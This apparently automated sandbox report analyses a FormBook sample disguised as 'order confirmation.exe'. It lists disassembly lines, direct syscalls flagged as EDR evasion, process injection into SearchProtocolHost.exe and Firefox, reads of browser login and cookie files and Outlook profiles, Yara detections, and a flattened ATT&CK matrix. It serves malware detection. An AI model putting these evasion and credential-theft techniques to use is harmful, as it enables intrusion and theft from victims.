                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0142EB1D mov eax, dword ptr fs:[00000030h]4_2_0142EB1D
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01478B28 mov eax, dword ptr fs:[00000030h]4_2_01478B28
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01478B28 mov eax, dword ptr fs:[00000030h]4_2_01478B28
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0BBE mov eax, dword ptr fs:[00000030h]4_2_013C0BBE
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0BBE mov eax, dword ptr fs:[00000030h]4_2_013C0BBE
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145EBD0 mov eax, dword ptr fs:[00000030h]4_2_0145EBD0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143CBF0 mov eax, dword ptr fs:[00000030h]4_2_0143CBF0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DEBFC mov eax, dword ptr fs:[00000030h]4_2_013DEBFC
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B8BF0 mov eax, dword ptr fs:[00000030h]4_2_013B8BF0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B8BF0 mov eax, dword ptr fs:[00000030h]4_2_013B8BF0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B8BF0 mov eax, dword ptr fs:[00000030h]4_2_013B8BF0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D0BCB mov eax, dword ptr fs:[00000030h]4_2_013D0BCB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D0BCB mov eax, dword ptr fs:[00000030h]4_2_013D0BCB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D0BCB mov eax, dword ptr fs:[00000030h]4_2_013D0BCB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B0BCD mov eax, dword ptr fs:[00000030h]4_2_013B0BCD
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B0BCD mov eax, dword ptr fs:[00000030h]4_2_013B0BCD
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B0BCD mov eax, dword ptr fs:[00000030h]4_2_013B0BCD
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01464BB0 mov eax, dword ptr fs:[00000030h]4_2_01464BB0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01464BB0 mov eax, dword ptr fs:[00000030h]4_2_01464BB0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013ECA38 mov eax, dword ptr fs:[00000030h]4_2_013ECA38
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D4A35 mov eax, dword ptr fs:[00000030h]4_2_013D4A35
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D4A35 mov eax, dword ptr fs:[00000030h]4_2_013D4A35
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DEA2E mov eax, dword ptr fs:[00000030h]4_2_013DEA2E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013ECA24 mov eax, dword ptr fs:[00000030h]4_2_013ECA24
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145EA60 mov eax, dword ptr fs:[00000030h]4_2_0145EA60
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0142CA72 mov eax, dword ptr fs:[00000030h]4_2_0142CA72
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0142CA72 mov eax, dword ptr fs:[00000030h]4_2_0142CA72
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013ECA6F mov eax, dword ptr fs:[00000030h]4_2_013ECA6F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013ECA6F mov eax, dword ptr fs:[00000030h]4_2_013ECA6F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013ECA6F mov eax, dword ptr fs:[00000030h]4_2_013ECA6F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143CA11 mov eax, dword ptr fs:[00000030h]4_2_0143CA11
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0A5B mov eax, dword ptr fs:[00000030h]4_2_013C0A5B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0A5B mov eax, dword ptr fs:[00000030h]4_2_013C0A5B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]4_2_013B6A50
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]4_2_013B6A50
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]4_2_013B6A50
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]4_2_013B6A50
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]4_2_013B6A50
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]4_2_013B6A50
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]4_2_013B6A50
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01406ACC mov eax, dword ptr fs:[00000030h]4_2_01406ACC
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01406ACC mov eax, dword ptr fs:[00000030h]4_2_01406ACC
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01406ACC mov eax, dword ptr fs:[00000030h]4_2_01406ACC
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B8AA0 mov eax, dword ptr fs:[00000030h]4_2_013B8AA0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B8AA0 mov eax, dword ptr fs:[00000030h]4_2_013B8AA0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E8A90 mov edx, dword ptr fs:[00000030h]4_2_013E8A90
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]4_2_013BEA80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]4_2_013BEA80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]4_2_013BEA80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]4_2_013BEA80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]4_2_013BEA80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]4_2_013BEA80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]4_2_013BEA80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]4_2_013BEA80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]4_2_013BEA80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484A80 mov eax, dword ptr fs:[00000030h]4_2_01484A80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EAAEE mov eax, dword ptr fs:[00000030h]4_2_013EAAEE
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EAAEE mov eax, dword ptr fs:[00000030h]4_2_013EAAEE
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01406AA4 mov eax, dword ptr fs:[00000030h]4_2_01406AA4
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B0AD0 mov eax, dword ptr fs:[00000030h]4_2_013B0AD0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E4AD0 mov eax, dword ptr fs:[00000030h]4_2_013E4AD0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E4AD0 mov eax, dword ptr fs:[00000030h]4_2_013E4AD0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E4D1D mov eax, dword ptr fs:[00000030h]4_2_013E4D1D
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A6D10 mov eax, dword ptr fs:[00000030h]4_2_013A6D10
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A6D10 mov eax, dword ptr fs:[00000030h]4_2_013A6D10
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A6D10 mov eax, dword ptr fs:[00000030h]4_2_013A6D10
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01448D6B mov eax, dword ptr fs:[00000030h]4_2_01448D6B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CAD00 mov eax, dword ptr fs:[00000030h]4_2_013CAD00
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CAD00 mov eax, dword ptr fs:[00000030h]4_2_013CAD00
                Source: C:\Users\user\Desktop\order confirmation.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtUnmapViewOfSection: Direct from: 0x77462D3CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\order confirmation.exeMemory written: C:\Users\user\Desktop\order confirmation.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: NULL target: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread register set: target process: 1308Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread APC queued: target process: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"Jump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"Jump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: XDBtzWJieMe.exe, 00000008.00000000.1896411434.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 00000008.00000002.2819879714.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000000.2060136726.0000000001070000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: XDBtzWJieMe.exe, 00000008.00000000.1896411434.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 00000008.00000002.2819879714.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000000.2060136726.0000000001070000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: XDBtzWJieMe.exe, 00000008.00000000.1896411434.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 00000008.00000002.2819879714.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000000.2060136726.0000000001070000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: XDBtzWJieMe.exe, 00000008.00000000.1896411434.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 00000008.00000002.2819879714.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000000.2060136726.0000000001070000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\order confirmation.exeQueries volume information: C:\Users\user\Desktop\order confirmation.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.order confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.order confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2820915719.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1984356146.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.order confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.order confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2820915719.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1984356146.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
